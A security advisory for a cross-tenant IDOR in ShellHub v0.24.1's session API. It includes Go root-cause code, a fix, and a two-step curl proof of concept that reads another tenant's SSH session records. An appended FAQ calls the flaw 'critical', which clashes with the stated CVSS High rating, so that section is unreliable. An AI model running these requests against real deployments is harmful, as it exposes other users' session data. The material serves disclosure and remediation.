GHSA-9w9c-9w8m-w89q
## Summary `GET /api/sessions/:uid` returns the full session object for any authenticated caller, without scoping by the caller's tenant. An authenticated user can read session records (SSH username, device UID, remote IP, terminal type, authenticated flag, timestamps) belonging to any other namespace. ## Severity **CVSS 3.1: 7.5 (High)** CWE-639 ## Affected versions ShellHub Community v0.24.1 (by code inspection — same vulnerable pattern as `GetDevice`). Not plant-reproducible without an active SSH session, but the flaw is structurally identical and confirmed via static analysis. ## Root cause `api/services/session.go:37-44` — `GetSession` resolves the session by UID without any tenant filter: ```go func (s *service) GetSession(ctx context.Context, uid models.UID) (*models.Session, error) { session, err := s.store.SessionResolve(ctx, store.SessionUIDResolver, string(uid)) // ⚠️ missing: s.store.Options().InNamespace(tenant) ... } ``` The `Authorize` middleware only verifies presence of a tenant in the context, not ownership of the requested session. ## Proof of concept Pre-requisite: attacker has any valid user account and has obtained a session UID from the victim tenant (UIDs may leak via logs, shared session recordings, UI URLs, or through the device IDOR in the companion advisory since sessions reference devices by UID). ```bash ATTACKER_TOKEN=$(curl -s -X POST http://target/api/login \ -H 'Content-Type: application/json' \ -d '{"username":"attacker","password":"..."}' | jq -r .token) # Attempt cross-tenant read curl -i "http://target/api/sessions/<victim-session-uid>" \ -H "Authorization: Bearer $ATTACKER_TOKEN" # Expected (fixed): HTTP 403/404 # Observed (v0.24.1): HTTP 200 + full session JSON ``` ## Impact - Cross-tenant disclosure of SSH session data: target username, device UID, remote IP, authenticated status, session type, terminal, position (geolocation), started_at / last_seen timestamps. - Enables reconnaissance of other tenants' active users and systems; combined with session recording features, can enable deeper recon. ## Suggested fix `api/services/session.go` — apply `InNamespace` in `GetSession`: ```go func (s *service) GetSession(ctx context.Context, uid models.UID) (*models.Session, error) { tenant := gateway.TenantFromContext(ctx) opts := []store.QueryOption{} if tenant != nil { opts = append(opts, s.store.Options().InNamespace(tenant.ID)) } session, err := s.store.SessionResolve(ctx, store.SessionUIDResolver, string(uid), opts...) ... } ```
Affected Software
Event History
Frequently Asked Questions
What is the severity of GHSA-9w9c-9w8m-w89q?
GHSA-9w9c-9w8m-w89q is considered a critical vulnerability due to unauthorized access to sensitive session data.
How do I fix GHSA-9w9c-9w8m-w89q?
To fix GHSA-9w9c-9w8m-w89q, upgrade to version 0.24.2 or later of the affected software.
What is affected by GHSA-9w9c-9w8m-w89q?
GHSA-9w9c-9w8m-w89q affects versions up to 0.24.1 of the ShellHub software package.
What kind of data can be accessed due to GHSA-9w9c-9w8m-w89q?
GHSA-9w9c-9w8m-w89q allows an authenticated user to access session records including SSH usernames and device IDs belonging to other users.
Who is at risk from GHSA-9w9c-9w8m-w89q?
Any user of the affected versions of ShellHub is at risk from GHSA-9w9c-9w8m-w89q due to improper session scoping.